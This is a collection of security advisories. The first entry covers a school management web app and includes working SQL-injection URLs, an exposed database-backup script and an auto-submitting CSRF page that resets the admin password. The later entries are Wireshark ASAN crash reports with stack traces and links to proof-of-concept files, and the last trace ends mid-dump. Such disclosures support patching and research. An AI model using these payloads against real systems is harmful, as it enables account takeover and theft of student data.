source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script code, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
##############
VULNERABILITY
##############
/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button white">Backup Download</a></label>
</html>
[Change Password Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://www.example.com/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>
Source: https://code.google.com/p/google-security-research/issues/detail?id=662
The following crash due to an assertion failure can be observed in an ASAN build of Wireshark (current git master) by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
ERROR:wmem_core.c:50:wmem_alloc: assertion failed: (allocator->in_scope)
Program received signal SIGABRT, Aborted.
0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) where
#0 0x00007fffe1c70cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007fffe1c740d8 in __GI_abort () at abort.c:89
#2 0x00007fffe3707165 in g_assertion_message () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007fffe37071fa in g_assertion_message_expr () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffee6b49f5 in wmem_alloc (allocator=<optimized out>, size=<optimized out>) at wmem_core.c:50
#5 0x00007fffeb0f7d40 in wmem_utoa (allocator=0x60700000bd90, port=512) at addr_resolv.c:604
#6 0x00007fffeb0f7c70 in udp_port_to_display (allocator=0x60700000bd90, port=512) at addr_resolv.c:2901
#7 0x00007fffec2e1998 in ipmi_fmt_udpport (s=0x7ffffffface0 "\030\366!\364\377\177", v=512)
at packet-ipmi.c:1283
#8 0x00007fffeb25d6ff in fill_label_number (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f", is_signed=0) at proto.c:7083
#9 0x00007fffeb2505e2 in proto_item_fill_label (fi=0x7ffe90b4c2c0,
label_str=0x7fffffffb5e0 "1111 11.. = Sequence Number: 0x3f") at proto.c:6651
#10 0x00007fffeb1f1799 in proto_tree_print_node (node=0x7ffe90b4c330, data=0x7fffffffc480) at print.c:164
#11 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4bd70,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#12 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4bd70, data=0x7fffffffc480) at print.c:219
#13 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x7ffe90b4b0e0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#14 0x00007fffeb1f2d93 in proto_tree_print_node (node=0x7ffe90b4b0e0, data=0x7fffffffc480) at print.c:219
#15 0x00007fffeb207927 in proto_tree_children_foreach (tree=0x619000152ef0,
func=0x7fffeb1f10e0 <proto_tree_print_node>, data=0x7fffffffc480) at proto.c:655
#16 0x00007fffeb1f1013 in proto_tree_print (print_args=0x7fffffffc6a0, edt=0x61300000de80,
output_only_tables=0x0, stream=0x602000340c10) at print.c:133
#17 0x000000000052b913 in print_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80) at tshark.c:4132
#18 0x00000000005266ff in process_packet (cf=0x14ac0c0 <cfile>, edt=0x61300000de80, offset=24,
whdr=0x61400000f060, pd=0x61b000012d80 "", tap_flags=0) at tshark.c:3742
#19 0x000000000051f961 in load_cap_file (cf=0x14ac0c0 <cfile>, save_file=0x0, out_file_type=2,
out_file_name_res=0, max_packet_count=0, max_byte_count=0) at tshark.c:3484
#20 0x0000000000515db0 in main (argc=3, argv=0x7fffffffe248) at tshark.c:2197
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11831. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38994.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=661
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7849==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f8e33764094 at pc 0x7f8e29788726 bp 0x7ffe27806640 sp 0x7ffe27806638
READ of size 4 at 0x7f8e33764094 thread T0
#0 0x7f8e29788725 in dissect_zcl_pwr_prof_pwrprofstatersp wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21
#1 0x7f8e2977f2be in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3494:21
#2 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f8e297738ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f8e2974de40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f8e29757897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f8e297518aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f8e29752ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f8e271ab417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f8e2826863b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f8e2825e35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f8e271a2dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f8e27eb25f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f8e271b0cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f8e271a35ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f8e271ad2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f8e2719eccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f8e2719e33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f8e2714c3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f8e33764094 is located 44 bytes to the left of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f8e337640c0) of size 64
0x7f8e33764094 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_pwrprofiles' defined in 'packet-zbee-zcl-general.c:3328:13' (0x7f8e33764080) of size 20
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3847:21 in dissect_zcl_pwr_prof_pwrprofstatersp
Shadow bytes around the buggy address:
0x0ff2466e47c0: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
0x0ff2466e47d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e47e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0ff2466e47f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4800: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
=>0x0ff2466e4810: 00 00[04]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff2466e4820: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4830: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0ff2466e4840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff2466e4860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7849==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11830. Attached are three files which trigger the crash.
Update: there is also a similar crash due to out-of-bounds access to the global "ett_zbee_zcl_pwr_prof_enphases" array, see the report below.
Attached is a file which triggers the crash.
--- cut ---
==8228==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0d4f321100 at pc 0x7f0d45344cd5 bp 0x7fff69e4e4a0 sp 0x7fff69e4e498
READ of size 4 at 0x7f0d4f321100 thread T0
#0 0x7f0d45344cd4 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25
#1 0x7f0d4533bd04 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:3463:21
#2 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f0d453308ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f0d4530b750 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1680:9
#12 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f0d4530aee1 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1033:13
#17 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#20 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#21 0x7f0d45314897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#22 0x7f0d4530e8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#23 0x7f0d4530fef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#24 0x7f0d42d68417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#25 0x7f0d43e2563b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#26 0x7f0d43e1b40a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:594:5
#27 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f0d42d5fdbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#30 0x7f0d43a6f5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#31 0x7f0d42d6dcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#32 0x7f0d42d605ea in call_dissector_work wireshark/epan/packet.c:691:9
#33 0x7f0d42d6a2be in call_dissector_only wireshark/epan/packet.c:2662:8
#34 0x7f0d42d5bccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#35 0x7f0d42d5b33b in dissect_record wireshark/epan/packet.c:501:3
#36 0x7f0d42d093c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#37 0x5264eb in process_packet wireshark/tshark.c:3728:5
#38 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#39 0x515daf in main wireshark/tshark.c:2197:13
0x7f0d4f321100 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:4460:13' (0x7f0d4f321120) of size 128
0x7f0d4f321100 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:3329:13' (0x7f0d4f3210c0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:3685:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0fe229e5c1d0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe229e5c1e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0fe229e5c1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c200: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c210: 00 00 04 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0fe229e5c220:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c230: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fe229e5c240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe229e5c270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8228==ABORTING
--- cut ---
Furthermore, there is yet another similar condition in a somewhat related area of code, see the attached file and report below:
--- cut ---
==8856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f148fad2900 at pc 0x7f1485afc15d bp 0x7ffd41dc3de0 sp 0x7ffd41dc3dd8
READ of size 4 at 0x7f148fad2900 thread T0
#0 0x7f1485afc15c in dissect_zcl_appl_evtalt_get_alerts_rsp wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21
#1 0x7f1485afab0f in dissect_zbee_zcl_appl_evtalt wireshark/epan/dissectors/packet-zbee-zcl-ha.c:818:21
#2 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#3 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#4 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#5 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#6 0x7f1485ae18ac in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:887:13
#7 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#10 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#11 0x7f1485abbe40 in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1029:21
#12 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#15 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#16 0x7f1485ac5897 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:665:9
#17 0x7f1485abf8aa in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:701:9
#18 0x7f1485ac0ef7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:337:5
#19 0x7f1483519417 in dissector_try_heuristic wireshark/epan/packet.c:2329:7
#20 0x7f14845d663b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1139:17
#21 0x7f14845cc35e in dissect_ieee802154 wireshark/epan/dissectors/packet-ieee802154.c:561:5
#22 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f1483510dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f14842205f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f148351ecc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f14835115ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f148351b2be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f148350cccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f148350c33b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f14834ba3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
0x7f148fad2900 is located 32 bytes to the left of global variable 'ett' defined in 'packet-zbee-zcl-ha.c:1391:18' (0x7f148fad2920) of size 136
0x7f148fad2900 is located 0 bytes to the right of global variable 'ett_zbee_zcl_appl_evtalt_alerts_struct' defined in 'packet-zbee-zcl-ha.c:698:13' (0x7f148fad28e0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-ha.c:889:21 in dissect_zcl_appl_evtalt_get_alerts_rsp
Shadow bytes around the buggy address:
0x0fe311f524d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f524f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe311f52520:[f9]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52530: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0fe311f52540: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0fe311f52550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe311f52570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8856==ABORTING
--- cut ---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38995.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=660
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7557==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7ff755ab5a18 at pc 0x7ff74b48f257 bp 0x7ffc467efe50 sp 0x7ffc467efe48
READ of size 4 at 0x7ff755ab5a18 thread T0
#0 0x7ff74b48f256 in dissct_rsl_ipaccess_msg wireshark/epan/dissectors/packet-rsl.c:3055:23
#1 0x7ff74b48a788 in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3181:18
#2 0x7ff74b4951cb in dissect_rsl_ie_err_msg wireshark/epan/dissectors/packet-rsl.c:2206:14
#3 0x7ff74b48bf1b in dissct_rsl_msg wireshark/epan/dissectors/packet-rsl.c:3383:22
#4 0x7ff74b48a477 in dissect_rsl wireshark/epan/dissectors/packet-rsl.c:3847:14
#5 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#6 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#7 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#8 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#9 0x7ff7499e3344 in call_dissector wireshark/epan/packet.c:2692:9
#10 0x7ff74a88a7ee in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:365:5
#11 0x7ff74a889dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#12 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#13 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#14 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#15 0x7ff74b98a9dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#16 0x7ff74b990043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#17 0x7ff74b98b39c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#18 0x7ff74b9a07a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#19 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#21 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x7ff74aae688b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x7ff74aaf12b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#26 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0x7ff7499d9964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x7ff74a5f848d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x7ff74a5f4725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x7ff74a5ecf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#37 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x7ff74a6e85f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#41 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0x7ff7499d433b in dissect_record wireshark/epan/packet.c:501:3
#44 0x7ff7499823c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x5264eb in process_packet wireshark/tshark.c:3728:5
#46 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#47 0x515daf in main wireshark/tshark.c:2197:13
0x7ff755ab5a18 is located 0 bytes to the right of global variable 'rsl_att_tlvdef' defined in 'packet-rsl.c:685:30' (0x7ff755ab5220) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-rsl.c:3055:23 in dissct_rsl_ipaccess_msg
Shadow bytes around the buggy address:
0x0fff6ab4eaf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fff6ab4eb40: 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
